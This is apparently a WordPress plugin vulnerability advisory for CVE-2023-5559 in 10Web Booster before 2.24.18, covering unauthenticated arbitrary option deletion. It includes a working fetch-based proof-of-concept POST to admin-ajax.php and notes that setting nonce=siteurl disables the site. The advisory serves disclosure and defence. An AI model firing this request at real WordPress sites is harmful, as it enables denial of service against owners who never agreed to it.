WordPress Plugin Vulnerabilities

10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion

Description

The plugin does not validate the option name given to some AJAX actions, allowing unauthenticated users to delete arbitrary options from the database, leading to denial of service.

Proof of Concept

fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": 'action=two_activate_score_check&nonce=template',
  "method": "POST",
});

Changing the `nonce` parameter to, for example, `nonce=siteurl` will cause the site to no longer work.

Affects Plugins

Plugin icon
tenweb-speed-optimizer
Fixed in 2.24.18

References

CVE
CVE-2023-5559

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
8.2 (high)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://cert.pl
Submitter twitter
cert_polska_en
Verified
Yes
WPVDB ID
eba46f7d-e4db-400c-8032-015f21087bbf

Timeline

Publicly Published
2023-10-31 (about 6 months ago)
Added
2023-10-31 (about 6 months ago)
Last Updated
2023-10-31 (about 6 months ago)

Other

Published
Title
Published
2022-03-11
Title
Material Design for Contact Form 7 <= 2.6.4 - Subscriber+ Arbitrary Settings Update leading to DoS
Published
2023-10-12
Title
WP ERP < 1.12.7 - Missing Authorization via admin notice dismissal
Published
2023-10-31
Title
WooODT Lite < 2.4.7 - Missing Authorization to Arbitrary Options Update
Published
2023-09-04
Title
Woocommerce Support System <= 1.2.2 - Unauthenticated Ticket Deletion/Update, Settings Update etc
Published
2023-09-01
Title
Easy Newsletter Signups <= 1.0.4 - Missing Authorization